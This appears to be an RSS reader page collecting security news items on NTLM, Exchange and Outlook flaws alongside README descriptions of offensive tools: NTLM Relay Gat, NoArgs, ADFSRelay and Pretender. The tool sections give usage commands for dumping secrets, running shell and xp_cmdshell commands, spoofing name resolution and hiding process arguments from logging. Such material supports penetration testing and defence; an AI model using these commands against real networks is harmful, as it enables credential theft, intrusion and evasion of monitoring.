FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
☷
β–³ πŸ”ƒ
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

Critical Veeam Backup Enterprise Manager Flaw Allows Authentication Bypass

By: Newsroom
Users of Veeam Backup Enterprise Manager are being urged to update to the latest version following the discovery of a critical security flaw that could permit an adversary to bypass authentication protections. Tracked as CVE-2024-29849 (CVSS score: 9.8), the vulnerability could allow an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as

NTLM Relay Gat - Powerful Tool Designed To Automate The Exploitation Of NTLM Relays

By: Zion3R


NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.


Features

  • Multi-threading Support: Utilize multiple threads to perform actions concurrently.
  • SMB Shares Enumeration: List available SMB shares.
  • SMB Shell Execution: Execute a shell via SMB.
  • Secrets Dumping: Dump secrets from the target.
  • MSSQL Database Enumeration: List available MSSQL databases.
  • MSSQL Command Execution: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.

Prerequisites

Before you begin, ensure you have met the following requirements:

  • proxychains properly configured with ntlmrelayx SOCKS relay port
  • Python 3.6+

Installation

To install NTLM Relay Gat, follow these steps:

  1. Ensure that Python 3.6 or higher is installed on your system.

  2. Clone NTLM Relay Gat repository:

git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
  1. Install dependencies, if you don't have them installed already:
pip install -r requirements.txt

NTLM Relay Gat is now installed and ready to use.

Usage

To use NTLM Relay Gat, make sure you've got relayed sessions in ntlmrelayx.py's socks command output and that you have proxychains configured to use ntlmrelayx.py's proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:

# List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10

# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets

# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs

# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'

Disclaimer

NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.

License

This project is licensed under the MIT License - see the LICENSE file for details.



NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

By: Zion3R


NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.


Default Cmd:


Windows Event Logs:


Using NoArgs:


Windows Event Logs:


Functionality Overview

The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

Hooking Mechanism

Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

Process Environment Block (PEB) Manipulation

The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

Demo: Running Mimikatz and passing it the arguments:

Process Hacker View:


All the arguemnts are hidden dynamically

Process Monitor View:


Technical Implementation

  1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

  2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

  3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

  4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

  5. Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.

Installation and Usage:

Option 1: Compile NoArgs DLL:

  • You will need microsoft/Detours">Microsoft Detours installed.

  • Compile the DLL.

  • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

Option 2: Download the compiled executable (ready-to-go) from the releases page.

Refrences:

  • https://en.wikipedia.org/wiki/Microsoft_Detours
  • https://github.com/microsoft/Detours
  • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
  • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++


Critical Exchange Server Flaw (CVE-2024-21410) Under Active Exploitation

By: Newsroom
Microsoft on Wednesday acknowledged that a newly disclosed critical security flaw in Exchange Server has been actively exploited in the wild, a day after it released fixes for the vulnerability as part of its Patch Tuesday updates. Tracked as CVE-2024-21410 (CVSS score: 9.8), the issue has been described as a case of privilege escalation impacting the Exchange Server. "An attacker

Researchers Uncover How Outlook Vulnerability Could Leak Your NTLM Passwords

By: Newsroom
A now-patched security flaw in Microsoft Outlook could be exploited by threat actors to access NT LAN Manager (NTLM) v2 hashed passwords when opening a specially crafted file. The issue, tracked as CVE-2023-35636 (CVSS score: 6.5), was addressed by the tech giant as part of its Patch Tuesday updates for December 2023. "In an email attack scenario, an attacker could exploit the

Alert: New Vulnerabilities Discovered in QNAP and Kyocera Device Manager

By: Newsroom
A security flaw has been disclosed in Kyocera’s Device Manager product that could be exploited by bad actors to carry out malicious activities on affected systems. "This vulnerability allows attackers to coerce authentication attempts to their own resources, such as a malicious SMB share, to capture or relay Active Directory hashed credentials if the β€˜Restrict NTLM: Outgoing NTLM

Microsoft Warns of Kremlin-Backed APT28 Exploiting Critical Outlook Vulnerability

By: Newsroom
Microsoft on Monday said it detected Kremlin-backed nation-state activity exploiting a now-patched critical security flaw in its Outlook email service to gain unauthorized access to victims' accounts within Exchange servers. The tech giant attributed the intrusions to a threat actor it called Forest Blizzard (formerly Strontium), which is also widely tracked under the

Hackers Can Exploit 'Forced Authentication' to Steal Windows NTLM Tokens

By: Newsroom
Cybersecurity researchers have discovered a case of "forced authentication" that could be exploited to leak a Windows user's NT LAN Manager (NTLM) tokens by tricking a victim into opening a specially crafted Microsoft Access file. The attack takes advantage of a legitimate feature in the database management system solution that allows users to link to external data sources, such as a remote

Microsoft to Phase Out NTLM in Favor of Kerberos for Stronger Authentication

By: Newsroom
Microsoft has announced that itΒ plansΒ to eliminate NT LAN Manager (NTLM) in Windows 11 in the future, as it pivots to alternative methods for authentication and bolster security. "The focus is on strengthening the Kerberos authentication protocol, which has been the default since 2000, and reducing reliance on NT LAN Manager (NTLM)," the tech giant said. "New features for Windows 11 include

Cybercriminals Using PowerShell to Steal NTLMv2 Hashes from Compromised Windows

By: THN
A new cyber attack campaign is leveraging the PowerShell script associated with a legitimate red teaming tool to plunderΒ NTLMv2 hashesΒ from compromised Windows systems primarily located in Australia, Poland, and Belgium. The activity has been codenamed Steal-It by Zscaler ThreatLabz. "In this campaign, the threat actors steal and exfiltrate NTLMv2 hashes using customized versions of Nishang'sΒ 

Microsoft Warns of Stealthy Outlook Vulnerability Exploited by Russian Hackers

By: Ravie Lakshmanan
Microsoft on Friday shared guidance to help customers discover indicators of compromise (IoCs) associated with a recently patched Outlook vulnerability. Tracked as CVE-2023-23397 (CVSS score: 9.8), theΒ critical flawΒ relates to a case of privilege escalation that could be exploited to steal NT Lan Manager (NTLM) hashes and stage aΒ relay attackΒ without requiring any user interaction. "External

ADFSRelay - Proof Of Concept Utilities Developed To Research NTLM Relaying Attacks Targeting ADFS

By: noreply@blogger.com (Unknown)


This repository includes two utilities NTLMParse and ADFSRelay. NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS. We have also released a blog post discussing ADFS relaying attacks in more detail [1].


NTLMParse Usage

To use the NTLMParse utility you simply need to pass a Base64 encoded message to the application and it will decode the relevant fields and structures within the message. The snippet given below shows the expected output of NTLMParse when it is invoked:

➜  ~ pbpaste | NTLMParse
(ntlm.AUTHENTICATE_MESSAGE) {
 Signature: ([]uint8) (len=8 cap=585) {
  00000000  4e 54 4c 4d 53 53 50 00                           |NTLMSSP.|
 },
 MessageType: (uint32) 3,
 LmChallengeResponseFields: (struct { LmChallengeResponseLen uint16; LmChallengeResponseMaxLen uint16; LmChallengeResponseBufferOffset uint32; LmChallengeResponse []uint8 }) {
  LmChallengeResponseLen: (uint16) 24,
  LmChallengeResponseMaxLen: (uint16) 24,
  LmChallengeResponseBufferOffset: (uint32) 160,
  LmChallengeResponse: ([]uint8) (len=24 cap=425) {
   00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
   00000010  00 00 00 00 00 00 00 00                           |........|
  }
 },
 NtChallengeResponseFields: (struct { NtChallengeResponseLen uint16; NtChallengeResponseMaxLen uint16; NtChallengeResponseBufferOffset uint32; NtChallengeResponse []uint8; NTLMv2Response ntlm.NTL   Mv2_RESPONSE }) {
  NtChallengeResponseLen: (uint16) 384,
  NtChallengeResponseMaxLen: (uint16) 384,
  NtChallengeResponseBufferOffset: (uint32) 184,
  NtChallengeResponse: ([]uint8) (len=384 cap=401) {
   00000000  30 eb 30 1f ab 4f 37 4d  79 59 28 73 38 51 19 3b  |0.0..O7MyY(s8Q.;|
   00000010  01 01 00 00 00 00 00 00  89 5f 6d 5c c8 72 d8 01  |........._m\.r..|
   00000020  c9 74 65 45 b9 dd f7 35  00 00 00 00 02 00 0e 00  |.teE...5........|
   00000030  43 00 4f 00 4e 00 54 00  4f 00 53 00 4f 00 01 00  |C.O.N.T.O.S.O...|
   00000040  1e 00 57 00 49 00 4e 00  2d 00 46 00 43 00 47 00  |..W.I.N.-.F.C.G.|

Below is a sample NTLM AUTHENTICATE_MESSAGE message that can be used for testing:

TlRMTVNTUAADAAAAGAAYAKAAAACAAYABuAAAABoAGgBYAAAAEAAQAHIAAAAeAB4AggAAABAAEAA4AgAAFYKI4goAYUoAAAAPqfU7N7/JSXVfIdKvlIvcQkMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwAQQBDAHIAbwBzAHMAZQByAEQARQBTAEsAVABPAFAALQBOAEkARAA0ADQANQBNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDrMB+rTzdNeVkoczhRGTsBAQAAAAAAAIlfbVzIctgByXRlRbnd9zUAAAAAAgAOAEMATwBOAFQATwBTAE8AAQAeAFcASQBOAC0ARgBDAEcAVQA0AEcASABPADAAOAA0AAQAGgBDAE8ATgBUAE8AUwBPAC4ATABPAEMAQQBMAAMAOgBXAEkATgAtAEYAQwBHAFUANABHAEgATwAwADgANAAuAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABQAaAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABwAIAIlfbVzIctgBBgAEAAIAAAAIADAAMAAAAAAAAAABAAAAACAAABQaOHb4nG5F2JL1tA5kL+nKQXJSJLDWljeBv+/XlPXpCgAQAON+EDXYnla0bjpwA8gfVEgJAD4ASABUAFQAUAAvAHMAdABzAC4AYwBvAG4AdABvAHMAbwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4ALgBjAG8AbQAAAAAAAAAAAKDXom0m65knt1NeZF1ZxxQ=

ADFSRelay Usage

The single required argument for ADFSRelay is the URL of the ADFS server to target for an NTLM relaying attack. Three optional arguments are -debug to enable debugging mode, -port to define the port the service should listen on, and -help to display the help menu. An example help menu is given below:

➜  ~ ADFSRelay -h
Usage of ADFSRelay:
  -debug
    	Enables debug output
  -help
    	Show the help menu
  -port int
    	The port the HTTP listener should listen on (default 8080)
  -targetSite string
    	The ADFS site to target for the relaying attack (e.g. https://sts.contoso.com)
➜  ~

References

[1] https://www.praetorian.com/blog/relaying-to-adfs-attacks/



Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing

By: noreply@blogger.com (Unknown)

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket's ntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disabled DHCPv6, DNS and router advertisements), --no-lnr (disabled mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be setup to only respond to queries for certain domains (or all but certain domains) and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary).
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack.
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.

Building and Vendoring

Pretender can be build as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


❌